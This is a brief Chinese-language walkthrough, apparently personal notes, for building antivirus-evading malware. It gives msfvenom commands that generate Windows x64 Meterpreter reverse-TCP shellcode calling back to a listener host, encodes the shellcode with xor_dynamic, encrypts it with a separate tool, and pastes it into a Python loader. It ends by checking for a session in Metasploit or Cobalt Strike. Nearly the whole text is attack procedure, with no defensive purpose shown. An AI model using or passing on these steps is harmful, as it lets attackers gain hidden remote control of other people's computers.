使用Python 64位版加载器
生成x64位的ShellCode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.112.216 LPORT=4444 -f py -o shellcode_64.py
使用64位版Python加载器
MSF监听实现反弹
Python加载器实现免杀
msfvenom -e x64/xor_dynamic -p windows/x64/meterpreter/reverse_tcp lhost=192.168.163.140 lport=4444 -f c -o shellcode_xor.c
运行:Shellcode_encryption.exe payload.c 对ShellCode代码进行加密处理
D:\网安\sike\ShellCode_Loader>Shellcode_encryption.exe shellcode_xor.c
将生成的密文ShellCode 填至 ShellCode_Loader.py 里的 Data = ‘密文Shellcode’ 处
运行ShellCode_Loader.py,确认MSF或CobaltStrike是否上线
成功!!!